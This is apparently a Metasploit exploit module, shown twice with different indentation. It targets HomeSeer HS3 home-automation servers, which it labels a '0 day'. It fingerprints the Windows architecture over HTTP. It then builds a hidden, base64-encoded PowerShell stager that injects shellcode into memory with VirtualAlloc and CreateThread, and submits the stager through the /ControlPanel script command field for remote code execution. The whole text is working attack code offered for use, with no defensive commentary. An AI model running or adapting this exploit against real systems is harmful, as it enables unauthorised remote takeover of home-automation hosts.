carnal0wnage/homeseer_code_execution.rb

## homeseer_code_execution.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HomeSeer Code Execution Vulnerability',
      'Description'    => %q{
          This exploit abuses a file upload issue and directory traversal in order
          to obtain code execution in HomeSeer HS3.
      },
      'Author'         => [ 'phikshun' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14774 $',
      'References'     =>
        [
          [ 'NA', 'NA' ],
        ],
      'DefaultOptions' =>
        {
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7/8 x86/x64', { 'Arch' => ARCH_X86 } ],
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '0 day, yo'))
  end

  def check_x64
    print_status('Checking windows version')
    res = send_request_cgi(
      {
        'uri'     => '/status',
        'method'  => 'POST',
        'data'    => "dir=\\"
      })
    if res.body =~ /Program Files \(x86\)/
      print_status('Found 64-bit Windows')
      return true
    else
      print_status('Found 32-bit Windows')
      return false
    end
  end

  def launch_shell(shell)
    shell = Rex::Text.uri_encode(shell)
    post_params = "devlist=&scriptcmd=#{shell}&id=runscript_ID598385&runscript=Submit"
    print_status('Uploading shell')
    res = send_request_cgi(
      {
        'uri'     => '/ControlPanel',
        'method'  => 'POST',
        'data'    => post_params
      })
  end

  def exploit
    print_status('Building powershell stager')

    # Create powershell script that will inject shell code from the selected payload
    ps = "$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"

    # Unicode encode powershell script
    ps_uni = Rex::Text.to_unicode(ps)

    # Base64 encode unicode
    ps_b64 = Rex::Text.encode_base64(ps_uni)

    # Final arguments for powershell
    args = "-w hidden -nop -ep bypass  -noexit -encodedCommand #{ps_b64}"

    if check_x64
      psh = "c:\\\\windows\\\\syswow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
    else
      psh = "c:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
    end
    script = "&hs.Launch \"#{psh}\", \"#{args}\", \"\", 0"
    launch_shell(script)
  end
end
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'HomeSeer Code Execution Vulnerability',
	'Description' => %q{
	This exploit abuses a file upload issue and directory traversal in order
	to obtain code execution in HomeSeer HS3.
	},
	'Author' => [ 'phikshun' ],
	'License' => MSF_LICENSE,
	'Version' => '$Revision: 14774 $',
	'References' =>
	[
	[ 'NA', 'NA' ],
	],
	'DefaultOptions' =>
	{
	},
	'Platform' => 'win',
	'Targets' =>
	[
	[ 'Windows 7/8 x86/x64', { 'Arch' => ARCH_X86 } ],
	],
	'Privileged' => false,
	'DefaultTarget' => 0,
	'DisclosureDate' => '0 day, yo'))
	end

	def check_x64
	print_status('Checking windows version')
	res = send_request_cgi(
	{
	'uri' => '/status',
	'method' => 'POST',
	'data' => "dir=\\"
	})
	if res.body =~ /Program Files \(x86\)/
	print_status('Found 64-bit Windows')
	return true
	else
	print_status('Found 32-bit Windows')
	return false
	end
	end

	def launch_shell(shell)
	shell = Rex::Text.uri_encode(shell)
	post_params = "devlist=&scriptcmd=#{shell}&id=runscript_ID598385&runscript=Submit"
	print_status('Uploading shell')
	res = send_request_cgi(
	{
	'uri' => '/ControlPanel',
	'method' => 'POST',
	'data' => post_params
	})
	end

	def exploit
	print_status('Building powershell stager')

	# Create powershell script that will inject shell code from the selected payload
	ps = "$code = @\"
	[DllImport(\"kernel32.dll\")]
	public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
	[DllImport(\"kernel32.dll\")]
	public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
	[DllImport(\"msvcrt.dll\")]
	public static extern IntPtr memset(IntPtr dest, uint src, uint count);
	\"@
	$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
	[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
	$size = 0x1000
	if ($sc.Length -gt 0x1000) {$size = $sc.Length}
	$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
	for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
	$winFunc::CreateThread(0,0,$x,0,0,0)"

	# Unicode encode powershell script
	ps_uni = Rex::Text.to_unicode(ps)

	# Base64 encode unicode
	ps_b64 = Rex::Text.encode_base64(ps_uni)

	# Final arguments for powershell
	args = "-w hidden -nop -ep bypass -noexit -encodedCommand #{ps_b64}"

	if check_x64
	psh = "c:\\\\windows\\\\syswow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
	else
	psh = "c:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
	end
	script = "&hs.Launch \"#{psh}\", \"#{args}\", \"\", 0"
	launch_shell(script)
	end
	end